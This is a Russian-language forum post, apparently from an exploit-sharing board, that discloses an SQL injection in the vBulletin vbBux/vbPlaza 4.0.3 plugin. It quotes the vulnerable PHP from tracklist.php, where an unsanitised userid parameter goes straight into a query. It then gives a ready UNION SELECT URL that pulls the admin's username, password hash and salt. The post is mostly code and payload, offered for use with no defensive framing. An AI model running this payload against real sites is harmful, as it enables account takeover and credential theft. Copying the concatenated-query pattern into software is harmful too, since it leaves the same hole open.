Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

vBulletin vbBux and vbPlaza v4 Plugin – SQL Injection

Тема в разделе vBulletin, создана пользователем ERROR404, 10 авг 2015.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    Плагин: http://www.vbulletin.org/forum/showthread.php?t=270271
    Версия: 4.0.3 (Последняя)
    Версия vB: 4.x.x



    Уязвимый код находится в файле /vbplaza/tracklist.php:
     

    // try to get the songs for this user
    if (empty($_REQUEST['userid']))
    {
    // set it to the currently logged in user
    $_REQUEST['userid'] = $vbulletin->userinfo['userid'];
    }

    // grab any user tracks from the database
    $usertrack_cache = array();
    if ($usertracks = $vbulletin->db->query_read("
    SELECT *
    FROM " . TABLE_PREFIX . "vbplaza_track_user
    WHERE userid = " . $_REQUEST['userid'] . "
    ORDER BY displayorder, usertrackid
    ")) SQL код:

    http://example.com/vbplaza/tracklist.php?userid=userid UNION ALL SELECT null, null, null, null, null, null, concat(username, 0x3a, password, 0x3a, salt), null, null FROM user WHERE userid = 1[​IMG]
     
    10 авг 2015 #1
Загрузка...
Похожие темы
  1. ERROR404
    Ответов:
    1
    Просмотров:
    561
  2. ERROR404
    Ответов:
    0
    Просмотров:
    405
  3. ERROR404
    Ответов:
    0
    Просмотров:
    359
  4. ERROR404
    Ответов:
    0
    Просмотров:
    327
  5. ERROR404
    Ответов:
    0
    Просмотров:
    404
Top